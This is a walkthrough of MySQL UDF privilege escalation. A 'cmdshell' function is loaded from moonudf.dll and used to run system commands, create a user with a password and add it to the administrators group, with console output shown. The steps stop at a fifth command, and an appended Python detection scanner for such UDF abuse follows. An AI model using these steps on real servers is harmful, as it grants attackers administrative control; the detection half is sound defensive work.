1. Create the cmdshell function:
mysql> create function cmdshell returns string soname 'moonudf.dll';
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

Query OK, 0 rows affected (0.25 sec)

2. List the user accounts:
mysql> select cmdshell('net user');
+-------------------------------------------------------------------------------+
| cmdshell('net user')                                                          |
+-------------------------------------------------------------------------------+
|
\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest
HelpAssistant            IUSR_PC-201202111331     IWAM_PC-201202111331
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。


--------------------------------------------完成!
 |
+-------------------------------------------------------------------------------+
1 row in set (0.22 sec)

3. Add a user account:
mysql> select cmdshell('net user test w321321 /add');
+-------------------------------------------------------------------------+
| cmdshell('net user test w321321 /add')                                  |
+-------------------------------------------------------------------------+
| 命令成功完成。


--------------------------------------------完成!
 |
+-------------------------------------------------------------------------+
1 row in set (0.36 sec)


4. Add the user to the administrators group:

mysql> select cmdshell('net localgroup administrators test /add ');
+-------------------------------------------------------------------------+
| cmdshell('net localgroup administrators test /add ')                    |
+-------------------------------------------------------------------------+
| 命令成功完成。


--------------------------------------------完成!
 |
+-------------------------------------------------------------------------+
1 row in set (0.22 sec)
Test result: [screenshot: MySQL privilege escalation]

5. View the open ports:
mysql> select cmdshell('netstat -an');
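As an added example, not part of the original walkthrough, the detection side of the steps above: a scanner over MySQL general-log lines that flags the `CREATE FUNCTION ... SONAME` load step and every later call to the created function, plus a check of `mysql.func` rows against a library allowlist. The log lines, the allowlist and the list of watched function names are constructed for this example.

```python
import re

# Constructed sample of MySQL general-log lines (general_log_file text
# format: timestamp, thread id, command type, argument). Not a real capture.
SAMPLE_LOG = [
    "2024-01-01T10:00:01.000000Z  1 Connect  root@localhost on mysql",
    "2024-01-01T10:00:02.000000Z  1 Query    create function cmdshell returns string soname 'moonudf.dll'",
    "2024-01-01T10:00:05.000000Z  1 Query    select cmdshell('net user')",
    "2024-01-01T10:00:09.000000Z  1 Query    select cmdshell('net localgroup administrators test /add ')",
    "2024-01-01T10:00:12.000000Z  1 Query    select user, host from mysql.user",
]

# The UDF load step: CREATE FUNCTION <name> RETURNS <type> SONAME '<library>'.
UDF_CREATE = re.compile(
    r"create\s+function\s+(?P<name>\w+)\s+returns\s+\w+\s+soname\s+'(?P<lib>[^']+)'",
    re.IGNORECASE,
)
# Function names commonly used by shell-executing UDFs (assumed watchlist);
# cmdshell is the one used on this page.
KNOWN_SHELL_UDFS = {"cmdshell", "sys_exec", "sys_eval"}


def scan_general_log(lines):
    """Return (line_no, kind, detail) findings: every SONAME-based UDF creation,
    and every later statement that calls a created or known shell UDF."""
    watched = {n.lower() for n in KNOWN_SHELL_UDFS}
    findings = []
    for n, line in enumerate(lines, 1):
        m = UDF_CREATE.search(line)
        if m:
            watched.add(m.group("name").lower())  # watch whatever name was just created
            findings.append((n, "udf_create", f"{m.group('name')} <- {m.group('lib')}"))
            continue
        call = re.compile(r"\b(" + "|".join(map(re.escape, sorted(watched))) + r")\s*\(",
                          re.IGNORECASE).search(line)
        if call:
            findings.append((n, "udf_call", call.group(1).lower()))
    return findings


def audit_func_table(rows, allowed_libs=frozenset()):
    """rows: (name, dl) tuples as returned by `SELECT name, dl FROM mysql.func`.
    Returns the registered UDFs whose library is not on the allowlist."""
    return [(name, dl) for name, dl in rows if dl not in allowed_libs]


if __name__ == "__main__":
    for hit in scan_general_log(SAMPLE_LOG):
        print(hit)
```

The same `mysql.func` check can be run on a schedule and diffed against a baseline, since a UDF registered there survives a server restart.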